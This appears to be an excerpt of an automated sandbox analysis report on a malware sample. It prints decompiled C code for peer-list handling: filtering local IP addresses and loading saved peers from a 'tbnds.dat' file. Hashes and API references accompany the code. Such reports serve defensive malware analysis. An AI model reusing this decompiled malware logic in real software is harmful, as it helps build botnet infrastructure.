                                                                                                                                                                                                                                                                  0x00404140
                                                                                                                                                                                                                                                                  0x00404147
                                                                                                                                                                                                                                                                  0x00404156
                                                                                                                                                                                                                                                                  0x0040415f
                                                                                                                                                                                                                                                                  0x00404162
                                                                                                                                                                                                                                                                  0x00404164
                                                                                                                                                                                                                                                                  0x0040416a
                                                                                                                                                                                                                                                                  0x00404186
                                                                                                                                                                                                                                                                  0x0040418c
                                                                                                                                                                                                                                                                  0x0040419c
                                                                                                                                                                                                                                                                  0x004041bc
                                                                                                                                                                                                                                                                  0x004041c2
                                                                                                                                                                                                                                                                  0x004041c9
                                                                                                                                                                                                                                                                  0x004041cd
                                                                                                                                                                                                                                                                  0x004041e5
                                                                                                                                                                                                                                                                  0x004041ef
                                                                                                                                                                                                                                                                  0x004041ef
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004041cd
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004041f7
                                                                                                                                                                                                                                                                  0x004041f7
                                                                                                                                                                                                                                                                  0x00404201

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                                                                                                                                                                                                  • String ID: %x%X$0
                                                                                                                                                                                                                                                                  • API String ID: 716646876-225668902
                                                                                                                                                                                                                                                                  • Opcode ID: 7a61a55b5eea98f5de0928e7475679bbe4d963543bacc3d689d31b3a0f4c3ad5
                                                                                                                                                                                                                                                                  • Instruction ID: 56e4f97a71f57edc04f120d05ce9dd721e6d08997ed102387e837c06df15420b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a61a55b5eea98f5de0928e7475679bbe4d963543bacc3d689d31b3a0f4c3ad5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB212174900208EBEB209BE0DD4DFAE7778BB44701F504139F602BA5D0DBB899499B68
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 181 409750-409767 call 409490 184 409769 181->184 185 40976e-40978a call 409200 strstr 181->185 186 409973-409976 184->186 189 40978c-4097a8 call 409200 strstr 185->189 190 4097cd-4097e9 call 409200 strstr 185->190 197 4097c8 189->197 198 4097aa-4097c6 call 409200 strstr 189->198 195 4097eb-409807 call 409200 strstr 190->195 196 40982c-409842 EnterCriticalSection 190->196 209 409827 195->209 210 409809-409825 call 409200 strstr 195->210 200 40984d-409856 196->200 197->186 198->190 198->197 204 409887-409892 call 4096a0 200->204 205 409858-409868 200->205 216 409968-40996d LeaveCriticalSection 204->216 217 409898-4098a6 204->217 206 409885 205->206 207 40986a-409883 call 40bb80 205->207 206->200 207->204 209->186 210->196 210->209 216->186 219 4098a8 217->219 220 4098ac-4098bd call 408820 217->220 219->220 220->216 223 4098c3-4098e0 call 40bb80 220->223 226 4098e2-4098f1 223->226 227 409937-409950 223->227 228 4098f3-4098fb Sleep 226->228 229 4098fd-409935 call 408990 226->229 230 409956-409961 call 4096a0 227->230 228->226 229->230 230->216 235 409963 call 409380 230->235 235->216
                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00409750(signed int _a4, intOrPtr _a8, signed int _a12) {
                                                                                                                                                                                                                                                                  				signed char _v5;
                                                                                                                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                                                                                                                  				signed int _v13;
                                                                                                                                                                                                                                                                  				signed int _v20;
                                                                                                                                                                                                                                                                  				signed char _t50;
                                                                                                                                                                                                                                                                  				char* _t52;
                                                                                                                                                                                                                                                                  				char* _t54;
                                                                                                                                                                                                                                                                  				char* _t57;
                                                                                                                                                                                                                                                                  				signed int _t61;
                                                                                                                                                                                                                                                                  				void* _t65;
                                                                                                                                                                                                                                                                  				char* _t68;
                                                                                                                                                                                                                                                                  				char* _t72;
                                                                                                                                                                                                                                                                  				signed int _t77;
                                                                                                                                                                                                                                                                  				char* _t78;
                                                                                                                                                                                                                                                                  				signed int _t80;
                                                                                                                                                                                                                                                                  				signed int _t89;
                                                                                                                                                                                                                                                                  				signed int _t91;
                                                                                                                                                                                                                                                                  				intOrPtr _t93;
                                                                                                                                                                                                                                                                  				char* _t95;
                                                                                                                                                                                                                                                                  				void* _t97;
                                                                                                                                                                                                                                                                  				void* _t98;
                                                                                                                                                                                                                                                                  				void* _t100;
                                                                                                                                                                                                                                                                  				void* _t102;
                                                                                                                                                                                                                                                                  				void* _t106;
                                                                                                                                                                                                                                                                  				void* _t109;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t50 = E00409490(_a4); // executed
                                                                                                                                                                                                                                                                  				_t98 = _t97 + 4;
                                                                                                                                                                                                                                                                  				_t74 = _t50 & 0x000000ff;
                                                                                                                                                                                                                                                                  				if((_t50 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  					_t52 = strstr(E00409200(_t74, _a4), "127.");
                                                                                                                                                                                                                                                                  					_t100 = _t98 + 0xc;
                                                                                                                                                                                                                                                                  					__eflags = _t52;
                                                                                                                                                                                                                                                                  					if(_t52 == 0) {
                                                                                                                                                                                                                                                                  						L6:
                                                                                                                                                                                                                                                                  						_t54 = strstr(E00409200(_t74, _a4), "10.");
                                                                                                                                                                                                                                                                  						_t102 = _t100 + 0xc;
                                                                                                                                                                                                                                                                  						__eflags = _t54;
                                                                                                                                                                                                                                                                  						if(_t54 == 0) {
                                                                                                                                                                                                                                                                  							L10:
                                                                                                                                                                                                                                                                  							EnterCriticalSection(0x4139ac);
                                                                                                                                                                                                                                                                  							_v5 = 0;
                                                                                                                                                                                                                                                                  							_v12 = 0;
                                                                                                                                                                                                                                                                  							while(1) {
                                                                                                                                                                                                                                                                  								__eflags = _v12 -  *0x4139e4; // 0x200
                                                                                                                                                                                                                                                                  								if(__eflags >= 0) {
                                                                                                                                                                                                                                                                  									break;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_t93 =  *((intOrPtr*)(0x4139e8 + _v12 * 4));
                                                                                                                                                                                                                                                                  								__eflags =  *((intOrPtr*)(_t93 + 4)) - _a4;
                                                                                                                                                                                                                                                                  								if( *((intOrPtr*)(_t93 + 4)) != _a4) {
                                                                                                                                                                                                                                                                  									_t95 = _v12 + 1;
                                                                                                                                                                                                                                                                  									__eflags = _t95;
                                                                                                                                                                                                                                                                  									_v12 = _t95;
                                                                                                                                                                                                                                                                  									continue;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_t65 = E0040BB80();
                                                                                                                                                                                                                                                                  								_t55 = _t65 - _a8;
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)( *((intOrPtr*)(0x4139e8 + _v12 * 4)) + 8)) = _t65 - _a8;
                                                                                                                                                                                                                                                                  								_v5 = 1;
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							E004096A0(_t55);
                                                                                                                                                                                                                                                                  							_t57 = _v5 & 0x000000ff;
                                                                                                                                                                                                                                                                  							__eflags = _t57;
                                                                                                                                                                                                                                                                  							if(_t57 != 0) {
                                                                                                                                                                                                                                                                  								L27:
                                                                                                                                                                                                                                                                  								LeaveCriticalSection(0x4139ac);
                                                                                                                                                                                                                                                                  								return _t57;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_v13 = 0;
                                                                                                                                                                                                                                                                  							__eflags =  *0x4139e4 - 0x200;
                                                                                                                                                                                                                                                                  							if( *0x4139e4 == 0x200) {
                                                                                                                                                                                                                                                                  								_v13 = 1;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_t57 = E00408820(0xc); // executed
                                                                                                                                                                                                                                                                  							_v20 = _t57;
                                                                                                                                                                                                                                                                  							__eflags = _v20;
                                                                                                                                                                                                                                                                  							if(_v20 == 0) {
                                                                                                                                                                                                                                                                  								goto L27;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_v20 + 4)) = _a4;
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_v20 + 8)) = E0040BB80() - _a8;
                                                                                                                                                                                                                                                                  								__eflags = _v13 & 0x000000ff;
                                                                                                                                                                                                                                                                  								if((_v13 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  									_t89 =  *0x4139e4; // 0x200
                                                                                                                                                                                                                                                                  									_t60 = _v20;
                                                                                                                                                                                                                                                                  									 *((intOrPtr*)(0x4139e8 + _t89 * 4)) = _v20;
                                                                                                                                                                                                                                                                  									_t77 =  *0x4139e4; // 0x200
                                                                                                                                                                                                                                                                  									_t78 = _t77 + 1;
                                                                                                                                                                                                                                                                  									__eflags = _t78;
                                                                                                                                                                                                                                                                  									 *0x4139e4 = _t78;
                                                                                                                                                                                                                                                                  									L25:
                                                                                                                                                                                                                                                                  									_t57 = E004096A0(_t60);
                                                                                                                                                                                                                                                                  									__eflags = _a12 & 0x000000ff;
                                                                                                                                                                                                                                                                  									if((_a12 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                  										_t57 = E00409380(_t57); // executed
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									goto L27;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									goto L21;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								while(1) {
                                                                                                                                                                                                                                                                  									L21:
                                                                                                                                                                                                                                                                  									_t61 =  *0x4139e4; // 0x200
                                                                                                                                                                                                                                                                  									__eflags =  *(0x4139e4[_t61]);
                                                                                                                                                                                                                                                                  									if( *(0x4139e4[_t61]) == 0) {
                                                                                                                                                                                                                                                                  										break;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									Sleep(1);
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_t91 =  *0x4139e4; // 0x200
                                                                                                                                                                                                                                                                  								 *(0x4139e4[_t91]) = 1;
                                                                                                                                                                                                                                                                  								_t80 =  *0x4139e4; // 0x200
                                                                                                                                                                                                                                                                  								E00408990(0x4139e4[_t80]);
                                                                                                                                                                                                                                                                  								_t60 =  *0x4139e4; // 0x200
                                                                                                                                                                                                                                                                  								0x4139e4[_t60] = _v20;
                                                                                                                                                                                                                                                                  								goto L25;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t68 = strstr(E00409200(_t74, _a4), ".10");
                                                                                                                                                                                                                                                                  						_t106 = _t102 + 0xc;
                                                                                                                                                                                                                                                                  						__eflags = _t68;
                                                                                                                                                                                                                                                                  						if(_t68 == 0) {
                                                                                                                                                                                                                                                                  							L9:
                                                                                                                                                                                                                                                                  							return _t68;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t68 = strstr(E00409200(_a4, _a4), ".10.");
                                                                                                                                                                                                                                                                  						_t102 = _t106 + 0xc;
                                                                                                                                                                                                                                                                  						__eflags = _t68;
                                                                                                                                                                                                                                                                  						if(_t68 != 0) {
                                                                                                                                                                                                                                                                  							goto L10;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L9;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t72 = strstr(E00409200(_t74, _a4), ".127");
                                                                                                                                                                                                                                                                  					_t109 = _t100 + 0xc;
                                                                                                                                                                                                                                                                  					__eflags = _t72;
                                                                                                                                                                                                                                                                  					if(_t72 == 0) {
                                                                                                                                                                                                                                                                  						L5:
                                                                                                                                                                                                                                                                  						return _t72;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t74 = _a4;
                                                                                                                                                                                                                                                                  					_t72 = strstr(E00409200(_a4, _a4), ".127.");
                                                                                                                                                                                                                                                                  					_t100 = _t109 + 0xc;
                                                                                                                                                                                                                                                                  					__eflags = _t72;
                                                                                                                                                                                                                                                                  					if(_t72 != 0) {
                                                                                                                                                                                                                                                                  						goto L6;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					goto L5;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t50;
                                                                                                                                                                                                                                                                  			}




























                                                                                                                                                                                                                                                                  0x0040975a
                                                                                                                                                                                                                                                                  0x0040975f
                                                                                                                                                                                                                                                                  0x00409762
                                                                                                                                                                                                                                                                  0x00409767
                                                                                                                                                                                                                                                                  0x00409780
                                                                                                                                                                                                                                                                  0x00409785
                                                                                                                                                                                                                                                                  0x00409788
                                                                                                                                                                                                                                                                  0x0040978a
                                                                                                                                                                                                                                                                  0x004097cd
                                                                                                                                                                                                                                                                  0x004097df
                                                                                                                                                                                                                                                                  0x004097e4
                                                                                                                                                                                                                                                                  0x004097e7
                                                                                                                                                                                                                                                                  0x004097e9
                                                                                                                                                                                                                                                                  0x0040982c
                                                                                                                                                                                                                                                                  0x00409831
                                                                                                                                                                                                                                                                  0x00409837
                                                                                                                                                                                                                                                                  0x0040983b
                                                                                                                                                                                                                                                                  0x0040984d
                                                                                                                                                                                                                                                                  0x00409850
                                                                                                                                                                                                                                                                  0x00409856
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040985b
                                                                                                                                                                                                                                                                  0x00409865
                                                                                                                                                                                                                                                                  0x00409868
                                                                                                                                                                                                                                                                  0x00409847
                                                                                                                                                                                                                                                                  0x00409847
                                                                                                                                                                                                                                                                  0x0040984a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040984a
                                                                                                                                                                                                                                                                  0x0040986a
                                                                                                                                                                                                                                                                  0x0040986f
                                                                                                                                                                                                                                                                  0x0040987c
                                                                                                                                                                                                                                                                  0x0040987f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040987f
                                                                                                                                                                                                                                                                  0x00409887
                                                                                                                                                                                                                                                                  0x0040988c
                                                                                                                                                                                                                                                                  0x00409890
                                                                                                                                                                                                                                                                  0x00409892
                                                                                                                                                                                                                                                                  0x00409968
                                                                                                                                                                                                                                                                  0x0040996d
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040996d
                                                                                                                                                                                                                                                                  0x00409898
                                                                                                                                                                                                                                                                  0x0040989c
                                                                                                                                                                                                                                                                  0x004098a6
                                                                                                                                                                                                                                                                  0x004098a8
                                                                                                                                                                                                                                                                  0x004098a8
                                                                                                                                                                                                                                                                  0x004098ae
                                                                                                                                                                                                                                                                  0x004098b6
                                                                                                                                                                                                                                                                  0x004098b9
                                                                                                                                                                                                                                                                  0x004098bd
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004098c3
                                                                                                                                                                                                                                                                  0x004098c9
                                                                                                                                                                                                                                                                  0x004098d7
                                                                                                                                                                                                                                                                  0x004098de
                                                                                                                                                                                                                                                                  0x004098e0
                                                                                                                                                                                                                                                                  0x00409937
                                                                                                                                                                                                                                                                  0x0040993d
                                                                                                                                                                                                                                                                  0x00409940
                                                                                                                                                                                                                                                                  0x00409947
                                                                                                                                                                                                                                                                  0x0040994d
                                                                                                                                                                                                                                                                  0x0040994d
                                                                                                                                                                                                                                                                  0x00409950
                                                                                                                                                                                                                                                                  0x00409956
                                                                                                                                                                                                                                                                  0x00409956
                                                                                                                                                                                                                                                                  0x0040995f
                                                                                                                                                                                                                                                                  0x00409961
                                                                                                                                                                                                                                                                  0x00409963
                                                                                                                                                                                                                                                                  0x00409963
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004098e2
                                                                                                                                                                                                                                                                  0x004098e2
                                                                                                                                                                                                                                                                  0x004098e2
                                                                                                                                                                                                                                                                  0x004098ee
                                                                                                                                                                                                                                                                  0x004098f1
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004098f5
                                                                                                                                                                                                                                                                  0x004098f5
                                                                                                                                                                                                                                                                  0x004098fd
                                                                                                                                                                                                                                                                  0x0040990a
                                                                                                                                                                                                                                                                  0x00409910
                                                                                                                                                                                                                                                                  0x0040991e
                                                                                                                                                                                                                                                                  0x00409926
                                                                                                                                                                                                                                                                  0x0040992e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040992e
                                                                                                                                                                                                                                                                  0x004098bd
                                                                                                                                                                                                                                                                  0x004097fd
                                                                                                                                                                                                                                                                  0x00409802
                                                                                                                                                                                                                                                                  0x00409805
                                                                                                                                                                                                                                                                  0x00409807
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040981b
                                                                                                                                                                                                                                                                  0x00409820
                                                                                                                                                                                                                                                                  0x00409823
                                                                                                                                                                                                                                                                  0x00409825
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00409825
                                                                                                                                                                                                                                                                  0x0040979e
                                                                                                                                                                                                                                                                  0x004097a3
                                                                                                                                                                                                                                                                  0x004097a6
                                                                                                                                                                                                                                                                  0x004097a8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004097af
                                                                                                                                                                                                                                                                  0x004097bc
                                                                                                                                                                                                                                                                  0x004097c1
                                                                                                                                                                                                                                                                  0x004097c4
                                                                                                                                                                                                                                                                  0x004097c6
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004097c6
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00409490: gethostname.WS2_32(?,00000100), ref: 004094AC
                                                                                                                                                                                                                                                                    • Part of subcall function 00409490: gethostbyname.WS2_32(?), ref: 004094BE
                                                                                                                                                                                                                                                                  • strstr.NTDLL ref: 00409780
                                                                                                                                                                                                                                                                  • strstr.NTDLL ref: 0040979E
                                                                                                                                                                                                                                                                  • strstr.NTDLL ref: 004097BC
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: strstr$gethostbynamegethostname
                                                                                                                                                                                                                                                                  • String ID: .10$.10.$.127$.127.$10.$127.
                                                                                                                                                                                                                                                                  • API String ID: 2540993189-3303897403
                                                                                                                                                                                                                                                                  • Opcode ID: bbd97cd4dbd9da2608c84d90ffaaa0edacdb86f8bbb659d7ec346016732e6242
                                                                                                                                                                                                                                                                  • Instruction ID: 0e6ba8cad48665767f72902f7a1038e3695d8b3c4a802ec0be8d7a0393df22e0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bbd97cd4dbd9da2608c84d90ffaaa0edacdb86f8bbb659d7ec346016732e6242
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0651C4F5A10204ABDB00EF61E842BAB7B65AB44305F14843FE944773C3D67ADA44CA9A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00409A60() {
                                                                                                                                                                                                                                                                  				void* _v8;
                                                                                                                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                                                                                                                  				void* _v16;
                                                                                                                                                                                                                                                                  				void* _v20;
                                                                                                                                                                                                                                                                  				long _v24;
                                                                                                                                                                                                                                                                  				DWORD* _v28;
                                                                                                                                                                                                                                                                  				signed int _v32;
                                                                                                                                                                                                                                                                  				void* _t39;
                                                                                                                                                                                                                                                                  				intOrPtr _t41;
                                                                                                                                                                                                                                                                  				void* _t42;
                                                                                                                                                                                                                                                                  				void* _t74;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				InitializeCriticalSection(0x4139ac);
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				while(_v12 < 0x200) {
                                                                                                                                                                                                                                                                  					E00409750( *((intOrPtr*)(0x4123b8 + _v12 * 4)), E0040BB80(), 0); // executed
                                                                                                                                                                                                                                                                  					_t74 = _t74 + 0xc;
                                                                                                                                                                                                                                                                  					_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_t39 = CreateFileW("C:\Users\hardz\tbnds.dat", 0x80000000, 0, 0, 3, 0, 0); // executed
                                                                                                                                                                                                                                                                  				_v8 = _t39;
                                                                                                                                                                                                                                                                  				if(_v8 != 0xffffffff) {
                                                                                                                                                                                                                                                                  					_v16 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
                                                                                                                                                                                                                                                                  					if(_v16 != 0) {
                                                                                                                                                                                                                                                                  						_v20 = MapViewOfFile(_v16, 4, 0, 0, 0);
                                                                                                                                                                                                                                                                  						if(_v20 != 0) {
                                                                                                                                                                                                                                                                  							_v24 = GetFileSize(_v8, 0);
                                                                                                                                                                                                                                                                  							_v28 = 0;
                                                                                                                                                                                                                                                                  							_v32 = 0;
                                                                                                                                                                                                                                                                  							while(_v28 < _v24 && _v32 < 0x200) {
                                                                                                                                                                                                                                                                  								E00409750( *((intOrPtr*)(_v20 + _v32 * 8)), E0040BB80() -  *((intOrPtr*)(_v20 + 4 + _v32 * 8)), 0);
                                                                                                                                                                                                                                                                  								_t74 = _t74 + 0xc;
                                                                                                                                                                                                                                                                  								_v28 =  &(_v28[2]);
                                                                                                                                                                                                                                                                  								_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							UnmapViewOfFile(_v20);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						CloseHandle(_v16);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					CloseHandle(_v8); // executed
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				E00409470(); // executed
                                                                                                                                                                                                                                                                  				_t41 =  *0x4139c8; // 0x2220628
                                                                                                                                                                                                                                                                  				_t42 = E0040B8C0(_t41, 0, E00409340, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                  				return _t42;
                                                                                                                                                                                                                                                                  			}














                                                                                                                                                                                                                                                                  0x00409a6b
                                                                                                                                                                                                                                                                  0x00409a71
                                                                                                                                                                                                                                                                  0x00409a83
                                                                                                                                                                                                                                                                  0x00409a9f
                                                                                                                                                                                                                                                                  0x00409aa4
                                                                                                                                                                                                                                                                  0x00409a80
                                                                                                                                                                                                                                                                  0x00409a80
                                                                                                                                                                                                                                                                  0x00409abd
                                                                                                                                                                                                                                                                  0x00409ac3
                                                                                                                                                                                                                                                                  0x00409aca
                                                                                                                                                                                                                                                                  0x00409ae4
                                                                                                                                                                                                                                                                  0x00409aeb
                                                                                                                                                                                                                                                                  0x00409b03
                                                                                                                                                                                                                                                                  0x00409b0a
                                                                                                                                                                                                                                                                  0x00409b18
                                                                                                                                                                                                                                                                  0x00409b1b
                                                                                                                                                                                                                                                                  0x00409b22
                                                                                                                                                                                                                                                                  0x00409b3d
                                                                                                                                                                                                                                                                  0x00409b6a
                                                                                                                                                                                                                                                                  0x00409b6f
                                                                                                                                                                                                                                                                  0x00409b31
                                                                                                                                                                                                                                                                  0x00409b3a
                                                                                                                                                                                                                                                                  0x00409b3a
                                                                                                                                                                                                                                                                  0x00409b78
                                                                                                                                                                                                                                                                  0x00409b78
                                                                                                                                                                                                                                                                  0x00409b82
                                                                                                                                                                                                                                                                  0x00409b82
                                                                                                                                                                                                                                                                  0x00409b8c
                                                                                                                                                                                                                                                                  0x00409b8c
                                                                                                                                                                                                                                                                  0x00409b92
                                                                                                                                                                                                                                                                  0x00409ba4
                                                                                                                                                                                                                                                                  0x00409baa
                                                                                                                                                                                                                                                                  0x00409bb5

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(004139AC,?,?,?,?,?,?,0040627D), ref: 00409A6B
                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(C:\Users\user\tbnds.dat,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00409ABD
                                                                                                                                                                                                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00409ADE
                                                                                                                                                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00409AFD
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 00409B12
                                                                                                                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 00409B78
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00409B82
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 00409B8C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BB80: NtQuerySystemTime.NTDLL ref: 0040BB8A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BB80: RtlTimeToSecondsSince1980.NTDLL ref: 0040BB98
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                                                                                                                                                                                                  • String ID: C:\Users\user\tbnds.dat$}b@
                                                                                                                                                                                                                                                                  • API String ID: 439099756-3051957126
                                                                                                                                                                                                                                                                  • Opcode ID: 85cc498fe0a550ab8f21b017235b98efada435567c81009c1b0704f3fad7d2e2
                                                                                                                                                                                                                                                                  • Instruction ID: 05997d6a355e4161d2a20ee8ba5da767b4ee5e7179cc67c9ae833650239d72a7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85cc498fe0a550ab8f21b017235b98efada435567c81009c1b0704f3fad7d2e2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1414F74E40208EBDB10DFE4DD4AFAEB770BB44715F208169E611BB2C2C6B86945CF99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
